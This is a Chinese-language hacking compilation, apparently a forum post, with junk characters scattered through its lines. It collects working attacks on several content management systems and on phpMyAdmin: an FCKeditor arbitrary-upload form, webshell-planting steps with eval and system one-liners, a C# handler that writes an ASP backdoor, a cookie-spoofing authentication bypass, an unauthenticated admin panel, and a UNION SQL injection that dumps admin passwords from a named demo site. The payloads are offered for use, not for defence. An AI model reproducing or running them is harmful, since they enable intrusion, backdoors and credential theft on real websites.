http://xxoo.com/controls/fckedit ... aspx/connector.aspx
. z1 c1 o/ |9 F+ ?% F7 w跳转到网站根目录上传任意文件。2 R) D3 E4 N5 e
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件6 p9 C5 \3 c7 O/ P# m9 A. `
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
" J5 X% |5 D7 ]5 N- {/ M) k: _Upload a new file:<br> r) q# P. v$ t, V
<input type="file" name="NewFile" size="50"><br>
+ F/ E1 J: G i" ~<input id="btnUpload" type="submit" value="Upload">7 n3 D3 N: @' q5 h# v- l- e; x t( {
</form>; O# B, ]2 s) [/ \ H
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 ^- c8 r* \5 r7 }4 k
# s; Y* G1 N1 a' k4 qSDcms 后台拿webshell
& `3 Y6 K% |$ C4 E [! a& t+ n u C! [: s% ^0 I
第一种方法:& L' ]' T# t/ }7 u4 a4 x( N [
进入后台-->系统管理-->系统设置-->系统设置->网站名称;6 R& J' j7 L2 N5 ^! B; m% M
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx" g+ @7 o" X2 X5 F6 r' L$ G V
用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。5 m5 X) [7 w2 v" d; @* u
第二种方法:% R/ B6 V; x$ o5 |/ z
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
, j8 F6 T; _: }/ m" |( R6 l8 s7 ^在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
5 T5 P! t! E4 y% V+ m4 x0 R5 H q第三种方法:
2 \( z, U0 D. N9 U9 ]进入后台-->界面管理-->模板文件管理-->创建文件
0 E& P) h7 ?5 u* T文件名写入getshell.ashx
8 `6 j t1 f& W, v# z内容写入下面内容: E3 \0 P. w3 @; l6 C$ S
/====================复制下面的=========================/
- D& B( H, m% o( V3 X* |4 p1 R5 e$ ]8 C<%@ WebHandler Language="C#" Class="Handler" %>2 K8 @+ ]5 b! n* U
using System;
- n1 ~& R0 }, |- }/ y9 pusing System.Web;. Z3 X$ N$ J9 d9 F# o% I$ u6 X% {, q
using System.IO;
6 Y6 p5 l& O. G- ipublic class Handler : IHttpHandler {
" P( I; J$ p+ Z. spublic void ProcessRequest (HttpContext context) {
' B- e( b7 [ K1 G8 acontext.Response.ContentType = "text/plain";
h4 p7 g0 B1 }) IStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
& S1 E' J0 v' rfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");( S8 w- \! B, N; ?) i
file1.Flush();2 A4 v1 G( d7 r' J! z! P9 t
file1.Close();' a! S2 d+ ~7 a5 d" s& S9 i: i
}
8 ?0 e" d8 y, V0 Ipublic bool IsReusable {
: X/ e0 v# P9 r% m7 rget {
& b0 {7 t7 R$ h( w" wreturn false;
5 v+ E- i# l- k! t, P k. }}
+ E4 _# t' k. l2 C) n}
7 Q1 B, W+ m7 M}
. S- O$ O. o2 e( W7 _' E/=============================================/5 r# o ~9 e& _& C" @' B
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx0 w9 }. `& X) M3 h7 w
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
1 F2 H( p% \! v. _2 ^-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ d: R9 I! b2 V& p5 Z
' U/ p4 S; L+ e1 V) u* X4 qESCMS网站管理系统0day9 N/ C$ }$ u! b, c6 n. Q, g! |2 r/ l
- p6 s# ]$ M {1 M2 D% U3 g+ B# N
后台登陆验证是通过admin/check.asp实现的* ^9 Z; o, ?6 D" E! K" a/ R6 d6 Z
* a4 L: h! O. N9 b; v U4 ?# X; O
首先我们打开http://target.com/admin/es_index.html
7 a# J H" ?% B7 c( z2 G然后在COOKIE结尾加上 E/ M( z& F+ b5 M9 Y
; ESCMS$_SP2=ES_admin=st0p;5 l0 ^6 R( T4 H; W
修改,然后刷新
8 x# H2 \& L6 a/ v进后台了嘎..
?3 M' z7 k& s: |然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
: Q/ V7 V0 T8 T+ K0 q8 h: u8 H+ q! T. g$ W
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
/ [" F* C- P5 K嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
, W2 k3 T! _8 K存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..& I( F* ?+ U; H% Y7 I
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
. a/ Z: J' F5 r( k0 [ Z------------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 m4 ?8 h4 ^/ V/ \* H4 c# b) W' x
8 V8 G, E# X2 y
宁志网站管理系统后台无验证漏洞及修复7 x2 ~2 _+ ?( g, [8 y l7 ?
! D7 ~ J- a8 [% \; e1 @
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
( U5 c8 G s% r官方网站:www.ningzhi.net
* D* l3 Q6 w2 ?( V1 s学校网站管理系统 V.2011版本
% p+ ^: j+ ]# J& @% l3 r0 q3 ^http://down.chinaz.com/soft/29943.htm
, z* P6 _3 U; a! }4 Z其它版本(如:政府版等),自行下载.: D0 L0 O% B% }0 ?$ n4 l4 i
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~* q( M; u& v9 t
login.asp代码如下:
- ?5 ], \9 n( X% K( f3 r/ ^. O<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
* |3 i; O& r; Smanage.asp代码我就不帖出来了.反正也没验证.
; _8 c# r. e0 v; K. `只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
% e8 A- w' L3 u漏洞利用:
1 L. i8 i5 S$ B3 s W0 Q) W直接访问http://www.0855.tv/admin/manage.asp' v. ?) ~9 V# r, z/ w" F
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5: V0 ~7 F- t* i: P. j' U
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Z; l( ?1 ]) D; l; l" h3 J) Q8 ?$ w5 b7 B2 g1 M5 @
phpmyadmin拿shell的四种方法总结及修复
9 n, g# R" \+ `+ m
' X+ ?! d& G7 b4 o0 Q方法一:
, H5 [8 X7 c( k. H, G5 cCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
5 ^+ ]9 f* j' W! gINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');* b* Z+ Z: w: e2 }# E' ~
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
2 X) s4 R* t2 K0 {5 _+ L# i2 i% s0 D----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php' [- r6 \" S% _9 U+ Q$ G& N7 `3 O+ l
一句话连接密码:7on
6 ]6 Y* K" Y/ O& @3 ~6 H方法二:
7 _3 I3 d/ p' e" F% g读取文件内容: select load_file('E:/xamp/www/s.php');
* b# m0 A( n( i3 Q2 Y写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
% {0 z' f1 D4 P7 |+ i# vcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
$ H. [% t. m( V Q3 w" |方法三:
6 T% c8 u2 b% }JhackJ版本 PHPmyadmin拿shell
- l7 R4 P4 U4 I2 a' }4 O+ \Create TABLE study (cmd text NOT NULL);/ U: S: N1 B5 w ^5 M, c. h' g# }
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
; ^$ v% y8 ^" L+ fselect cmd from study into outfile 'E:/wamp/www/7.php';! H- K3 o, S) k, B" W2 x! E J
Drop TABLE IF EXISTS study;
8 Y7 ]% @0 b3 H+ B' Y<?php eval($_POST[cmd])?>
% y/ o" R: y7 P2 LCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。+ _( E! s- u2 o( F1 y
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1+ n' X6 {0 K3 s6 x% d/ D4 p
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
5 d' U* e6 x3 O& G7 d+ JDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。# B2 |' A* p" X3 A; F6 L9 }
方法四:
/ k1 ?# w+ R; qselect load_file('E:/xamp/www/study.php');) i# \1 z' x, M$ k% T
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'; a' Y% E5 M! R9 Q
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
. V! t) C. e$ d# j' _-----------------------------------------------------------------------------------------------------------------------------------------------------------------------0 e* R- D4 C6 }7 E
$ C& k) F( p6 U7 t/ r; F- v" ]
NO.001中学网站管理系统 Build 110628 注入漏洞% A; ~) ]* \) f8 O. A# t: W: L
8 H* d( t a" F6 k
NO.001中学网站管理系统功能模块:
4 E/ r, L5 J9 T) S1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
# j* U! }- @0 n$ ^. ^1 W2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
8 A1 t I- N' U3 q: n2 M3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
# M$ e5 u& Z7 K J5 r8 v- w4.视频图片管理:一级分类,动态添加视频或者图片等信息
6 j, s& H+ w4 J- O/ S9 }6 n$ b: c7 r4 n5.留言管理:对留言,修改,删除、回复等管理9 Z1 i& A6 Z" q, o9 A; y; ^$ ]
6.校友频道:包括校友资料excel导出、管理等功能
! _2 _) i) |1 j; a9 q& s7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页* e+ ?# ]+ c$ ]8 F" i$ }
默认后台:admin/login.asp! g. y# |- ]4 B9 x8 C5 ^& y
官方演示:http://demo.001cms.net
0 d: a7 S, m/ l& v4 h) O6 u源码下载地址:http://down.chinaz.com/soft/30187.htm
9 o* W* @4 T7 HEXP:8 {5 O. ~) r, T
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin9 Q' Y, w2 Z/ A4 E4 k4 Y4 z
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin6 U1 z: o& Z4 |* G- W
getshell:后台有备份,你懂的
5 g& z2 |( x5 h6 m另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。/ T6 _% ?# G% t) a
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |